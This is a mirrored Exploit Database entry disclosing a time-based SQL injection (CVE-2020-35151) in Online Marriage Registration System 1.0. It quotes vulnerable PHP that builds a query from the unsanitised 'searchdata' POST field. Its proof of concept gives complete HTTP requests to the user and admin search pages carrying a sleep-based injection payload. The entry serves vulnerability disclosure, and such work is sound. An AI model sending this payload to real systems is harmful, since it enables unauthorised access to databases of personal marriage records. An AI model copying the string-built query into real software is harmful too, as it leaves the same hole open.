Online Marriage Registration System 1.0 – ‘searchdata’ SQL Injection

• Exploit Database
• 43 阅读

• 作者： Raffaele Sabato
  日期： 2020-12-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49307/

• # Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
  # Date: 12-21-2020
  # Exploit Authors: Andrea Bruschi, Raffaele Sabato
  # Vendor: Phpgurukul
  # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
  # Version: 1.0
  # CVE: CVE-2020-35151
  
  I DESCRIPTION
  ========================================================================
  
  A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. 
  Following the vulnerable code:
  
  $sdata=$_POST['searchdata'];
  ?>
  <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4>
  <table id="datatable1" class="table display responsive nowrap">
  <thead>
  <tr>
  <th class="wd-15p">S.No</th>
  
  <th class="wd-15p">Reg Number</th>
  <th class="wd-20p">Husband Name</th>
  
  <th class="wd-10p">Date of Marriage</th>
  <th class="wd-10p">Status</th>
  <th class="wd-25p">Action</th>
  </tr>
  </thead>
  <tbody>
  <?php
  $uid=$_SESSION['omrsuid'];
  $sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'";
  $query = $dbh -> prepare($sql);
  $query->execute();
  $results=$query->fetchAll(PDO::FETCH_OBJ);
  
  II PROOF OF CONCEPT
  ========================================================================
  
  ## Request user
  
  POST /omrs/user/search.php HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884
  Content-Length: 320
  Origin: http://127.0.0.1
  Connection: close
  Referer: http://127.0.0.1/omrs/user/search.php
  Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
  Upgrade-Insecure-Requests: 1
  
  -----------------------------197361427118054779422510078884
  Content-Disposition: form-data; name="searchdata"
  
  ' and (select 1 from (select(sleep(5)))a) and 'a'='a
  -----------------------------197361427118054779422510078884
  Content-Disposition: form-data; name="search"
  
  
  -----------------------------197361427118054779422510078884--
  
  ## Request admin
  
  POST /omrs/admin/search.php HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522
  Content-Length: 320
  Origin: http://127.0.0.1
  Connection: close
  Referer: http://127.0.0.1/omrs/admin/search.php
  Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2
  Upgrade-Insecure-Requests: 1
  
  -----------------------------267799269040335247322746025522
  Content-Disposition: form-data; name="searchdata"
  
  ' and (select 1 from (select(sleep(5)))a) and 'a'='a
  -----------------------------267799269040335247322746025522
  Content-Disposition: form-data; name="search"
  
  
  -----------------------------267799269040335247322746025522--